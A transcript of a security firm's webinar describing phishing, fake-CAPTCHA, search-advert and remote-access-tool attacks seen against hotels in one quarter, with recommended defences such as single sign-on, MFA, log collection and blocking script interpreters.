Hello and welcome to our hospitality security webinar. This is the very first webinar that we’ve been doing this year. We’ve started a new series because we want to deliver actionable intelligence to our hospitality customers and others within the industry. What we are seeing is that hospitality is one of the most targeted industries today.

Many people assume most attacks focus on critical national infrastructure. While that certainly happens, we actually see hospitality as one of the highest targeted industries and often one of the first targeted as well.

What we wanted to do today is walk through some of the things we have been seeing in quarter one of this year so you have the information you need to protect your companies.

Over this session I will step through some of the threats we have been seeing. Then in the second part of today’s webinar we are very lucky to have one of our team members, Kurt, who will walk you through some of the physical security testing we have been carrying out within hospitality and show some of the interesting findings we have uncovered.

So let’s kick off.

A very quick introduction for those who do not know us. ThreatSpike is a company that I co-founded and we have grown extensively over the last few years across the globe. We now cover a very large number of industries. We see a lot of active security threats and we are able to spot patterns of activity emerging, identifying where something first starts and how it evolves over time.

Having a global customer base has helped us understand the cultural differences between regions and the different approaches organisations take towards cyber security.

With that said, I will take you through some of the things we have seen this quarter.

Some of the things we have observed have appeared in previous years. For example we will talk about Booking.com phishing attacks which have been happening for the last couple of years. However we have also seen some interesting developments that we have not seen before in all the time we have been monitoring these threats.

One of the key things that happened at the beginning of this year involved Revinate. Revinate, as most of you will know, is one of the largest direct booking platform vendors in the hospitality industry.

What happened was similar to the Booking.com attacks. A series of phishing emails were sent out to Revinate customers pretending to come from Revinate itself.

In some cases the emails appeared to come from Revinate’s own email address, hoping that email protection systems would fail and allow them through without properly checking SPF or DKIM records. In other cases the emails came from completely different email addresses, hoping the recipient would not closely check the sender.

In all cases the emails directed the user to log into their Revinate account to deal with a supposed issue, usually threatening that the service was about to be disrupted or cancelled.

When users clicked the link they landed on a phishing page, very similar to the Booking.com phishing attacks. This page captured their username and password.

Attackers then used those credentials to log into the Revinate CRM platform as that customer. Once inside they accessed various areas of the system such as guest information. Revinate does not provide much native export functionality, so the attackers manually stepped through page after page of guest data, taking screenshots or saving the pages locally as HTML.

They effectively captured sensitive guest information, although interestingly they did not use that information immediately.

Earlier this year, in January, guests suddenly started receiving phishing emails asking them to make payments related to their bookings. In some cases it was presented as an additional payment before arrival, or a secondary payment after the original booking.

Guests began receiving these messages and some recognised that something was not right and reported it to the hotels. What was particularly interesting was that the attackers had stored the stolen information for months before using it.

When investigating this further, Revinate’s response in January was that the breach had actually occurred months earlier, around August to November 2024. At that time Revinate did not enforce multi-factor authentication on accounts.

Because there was no MFA requirement, a simple username and password phishing attack was enough to capture credentials and access the platform.

Unfortunately by the time this came to light a significant amount of time had passed. Despite Revinate being a compliant organisation, they only retained thirty days of access logs. That meant it was impossible to determine which accounts had been compromised, when they were compromised, or what activity had taken place.

This created a serious data privacy issue because there was no way to perform proper triage or root cause analysis. Customers had to rely on Revinate’s explanation that their systems were not compromised directly, but there was little evidence available to prove that either way.

There are a few key lessons from this.

Firstly organisations should integrate these types of web applications, such as Booking.com and Revinate, into single sign on systems wherever possible. Unfortunately vendors do not always provide that capability, so increased pressure on them to support these integrations would significantly reduce risk.

Secondly, wherever multi-factor authentication is available it should always be used. Revinate did offer MFA but many users had not enabled it.

Finally, where possible organisations should capture audit logs from these platforms and pull them into their own SIEM or log management systems. That allows suspicious login activity to be detected just as it would with platforms like Microsoft 365 or Azure.

Moving on to the next threat we have seen this year, something that again appeared in hospitality before spreading into other industries, is fake CAPTCHA attacks.

In this scenario attackers create a website pretending to be the Booking.com partner hub. However the URL clearly shows that it is not Booking.com.

Users receive links similar to earlier phishing attacks, but instead of asking for usernames and passwords they are asked to prove they are not a robot. The instructions tell the user to press the Windows key and R, paste a command and press enter.

What actually happens is that the web page copies a malicious script onto the user’s clipboard using JavaScript. The user then pastes it into the Windows run dialogue and executes it.

The command uses MSHTA, which is a Windows script interpreter, to download and execute malicious code from the internet. It even includes a small phrase such as “I am not a robot” to make the command look legitimate.

We are seeing this technique spread quickly and it has been very effective at convincing users to execute malicious commands.

To defend against this type of attack organisations should block unnecessary script interpreters such as MSHTA and PowerShell where possible. They should also consider disabling the Windows run dialogue for standard users and ensure that endpoint detection and response tools are deployed to detect and block these activities.

Another interesting development we have seen this year is fully AI generated phishing emails.

Last year we started seeing partially AI generated messages. Now we are seeing entire phishing campaigns generated using AI.

Hotels receive emails that appear to come from guests complaining about a poor stay, bad food or a negative review. Within the email is a link which supposedly points to the review. In reality it leads to a phishing site.

The level of detail in these emails is impressive, but analysis using tools such as ZeroGPT shows that the entire message is generated by AI.

This allows attackers to produce highly varied phishing emails that bypass traditional mail filtering rules. There may be no suspicious branding or obvious malicious indicators. It simply appears to be a guest complaint.

Booking.com phishing attacks continue to evolve as well. Attackers constantly experiment with different formats to bypass email security systems.

Some emails claim that a guest has left a complaint and ask the recipient to click a link for details. Others contain almost no information but include a PDF attachment that contains a copy of the message with a phishing link.

Another particularly interesting case involved hotels receiving fraudulent messages through the Booking.com platform itself.

Even after securing their Booking.com accounts and enabling multi-factor authentication, guests were still receiving phishing messages that appeared to come through the legitimate Booking.com messaging system.

After investigation it turned out the Booking.com accounts themselves had not been compromised. Instead the organisation had an internally developed CRM system storing guest details.

Every Booking.com guest has a unique email address that forwards messages into the Booking.com messaging platform. Attackers gained access to the internal CRM and harvested these email addresses. They then sent phishing messages directly to those addresses, which appeared inside the Booking.com app as legitimate messages.

Since they did not have access to the Booking.com account itself they could not include clickable links, so they split the links into multiple parts and asked guests to reconstruct them manually.

We have also seen attackers buying advertisements on search engines to target guests before they reach legitimate hotel websites.

A guest searches for a hotel and sees an advert above the genuine website. The advert leads to a fake booking page where prices are inflated or payment details are stolen.

In the future this technique could easily be used for phishing pages or malware downloads. Attackers are willing to pay for advertising to place malicious links above legitimate websites.

Organisations should regularly check search engine results for their hotel names to ensure no fraudulent adverts are appearing. There are also reputation protection services that monitor this automatically and raise alerts if suspicious activity is detected.

Another attack we have seen involves phishing emails containing encoded URLs. These emails ask the user to copy and paste a link into their browser rather than clicking it.

The link uses URL encoding so email security tools do not recognise it as a valid URL. When pasted into a browser it automatically decodes and redirects the user to a malicious site hosted on legitimate services such as Google Looker Studio or OneDrive. These platforms are often used as staging points before redirecting users to phishing pages.

Finally there has been a significant increase in what are known as “living off the land” attacks.

Instead of installing malware, attackers persuade staff to install legitimate remote access tools such as TeamViewer or AnyDesk. Once installed the attacker can reconnect to that machine whenever they want and access everything the user can see.

In some cases attackers then extract stored browser credentials. If passwords are saved in the browser they can capture them using developer tools or session cookies. Even multi-factor authentication does not always protect against session hijacking if cookies are stolen.

The key defences here include blocking remote access tools where they are not required, monitoring application logs for suspicious behaviour, and preventing users from storing passwords in browsers.

Rather than taking questions now I am going to hand over to Kurt, who will walk you through some of the physical penetration testing we carry out for hospitality customers and some of the common findings we encounter.